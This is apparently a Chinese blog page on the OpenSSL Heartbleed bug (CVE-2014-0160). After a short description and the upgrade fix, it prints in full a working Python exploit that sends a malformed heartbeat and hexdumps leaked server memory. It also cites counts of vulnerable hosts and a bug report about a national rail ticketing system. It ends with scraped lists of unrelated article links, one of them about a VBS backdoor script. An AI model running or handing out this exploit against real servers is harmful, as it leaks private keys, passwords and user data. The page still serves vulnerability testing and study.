在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

Exploit:

openssl.py

 #!/usr/bin/python

 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

 # The author disclaims copyright to this source code.

 import sys

 import struct

 import socket

 import time

 import select

 import re

 from optparse import OptionParser

 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

 def h2bin(x):

     return x.replace(' ', '').replace('\n', '').decode('hex')

 hello = h2bin('''

 16 03 02 00  dc 01 00 00 d8 03 02 53

 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

 00 0f 00 01 01

 ''')

 hb = h2bin('''

 18 03 02 00 03

 01 40 00

 ''')

 def hexdump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b : b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

         print '  %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def recvall(s, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         r, w, e = select.select([s], [], [], 5)

         if s in r:

             data = s.recv(remain)

             # EOF?

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     return rdata

 def recvmsg(s):

     hdr = recvall(s, 5)

     if hdr is None:

         print 'Unexpected EOF receiving record header - server closed connection'

         return None, None, None

     typ, ver, ln = struct.unpack('>BHH', hdr)

     pay = recvall(s, ln, 10)

     if pay is None:

         print 'Unexpected EOF receiving record payload - server closed connection'

         return None, None, None

     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

     return typ, ver, pay

 def hit_hb(s):

     s.send(hb)

     while True:

         typ, ver, pay = recvmsg(s)

         if typ is None:

             print 'No heartbeat response received, server likely not vulnerable'

             return False

         if typ == 24:

             print 'Received heartbeat response:'

             hexdump(pay)

             if len(pay) > 3:

                 print 'WARNING: server returned more data than it should - server is vulnerable!'

             else:

                 print 'Server processed malformed heartbeat, but did not return any extra data.'

             return True

         if typ == 21:

             print 'Received alert:'

             hexdump(pay)

             print 'Server returned error, likely not vulnerable'

             return False

 def main():

     opts, args = options.parse_args()

     if len(args) < 1:

         options.print_help()

         return

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     print 'Connecting...'

     sys.stdout.flush()

     s.connect((args[0], opts.port))

     print 'Sending Client Hello...'

     sys.stdout.flush()

     s.send(hello)

     print 'Waiting for Server Hello...'

     sys.stdout.flush()

     while True:

         typ, ver, pay = recvmsg(s)

         if typ == None:

             print 'Server closed connection without sending Server Hello.'

             return

         # Look for server hello done message.

         if typ == 22 and ord(pay[0]) == 0x0E:

             break

     print 'Sending heartbeat request...'

     sys.stdout.flush()

     s.send(hb)

     hit_hb(s)

 if __name__ == '__main__':

     main()

来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

http://wooyun.org/bugs/wooyun-2014-055939

OpenSSL "heartbleed" 安全漏洞的更多相关文章

  1. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. 升级OpenSSL修复高危漏洞Heartbleed

    升级OpenSSL修复高危漏洞Heartbleed 背景:          OpenSSL全称为Secure Socket Layer.是Netscape所研发.利用数据加密(Encryption) ...

  5. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  6. OpenSSL Heartbleed原因小结

    User发送心跳报文给Server,Server复制心跳报文的内容回应User. memcpy(bp, p1, payload); Server拷贝心跳报文的内容给Client时,如果拷贝的字节数目超 ...

  7. OpenSSL心脏出血漏洞全回顾

    近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存 ...

  8. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  9. 对OpenSSL心脏出血漏洞的试验

    1.安装OpenSSL环境 sudo apt-get install openssl sudo pip install pyopenssl(中间会提示ffi.h 没有那个文件或目录,sudo apt- ...

随机推荐

  1. POJ 2411 状态压缩递,覆盖方案数

    无非就是横着放与竖着放,状态中用1表示覆盖,0表示未覆盖. #include <iostream> #include <vector> #include <algorit ...

  2. storage在IE8下的兼容性写法

    storage 本地缓存,这是HTML5的一个非常好用的地方,具体好用在哪,网上可以找到很多,但是我觉得总结的都不是很完整,我建议大家有空的话可以看下JavaScript权威指南这本书,里面对于这个方 ...

  3. BogoMIPS与calibrate_delay

    在分析Arm+linux启动信息的时候.发现有一个信息竟然耗费了2s的时间,这简直是不能忍受的.这个耗时大鳄是什么东西哪,请看分析信息: [    0.000000] console [ttyMT0] ...

  4. 详细解剖大型H5单页面应用的核心技术点

    项目 Xut.js 阐述下开发中一个比较核心的优化技术点,这是一套平台代码,并非某一个插件功能或者框架可以直接拿来使用,核心代码大概是6万行左右(不包含任何插件) .这也并非一个开源项目,不能商业使用 ...

  5. Hadoop集群

    你可以用以下三种支持的模式中的一种启动Hadoop集群: 单机模式 伪分布式模式 完全分布式模式 单机模式的操作方法 默认情况下,Hadoop被配置成以非分布式模式运行的一个独立Java进程.这对调试 ...

  6. oracle 12c 新特性之(相同字段上的多重索引、ddl 日志、限制PGA的大小、分页查询)

    1. 相同字段上的多重索引   在Oracle 12c R1之前,一个字段是无法以任何形式拥有多个索引的.或许有人会想知道为什么通常一个字段需要有多重索引,事实上需要多重索引的字段或字段集合是很多的. ...

  7. c# post basic 接口

    string url = "http://xxxxxxxxx";//地址,请反复检查地址的准确性 string usernamePassword = "username: ...

  8. Vbs脚本实现radmin终极后门

    Vbs脚本实现radmin终极后门 代码如下: on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = ...

  9. c# 对加密的MP4文件进行解密

    using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; usin ...

  10. Python下划线的使用

    References: [1]. http://python.jobbole.com/81129/ 本文将讨论Python中下划线(_)字符的使用方法.我们将会看到,正如Python中的很多事情,下划 ...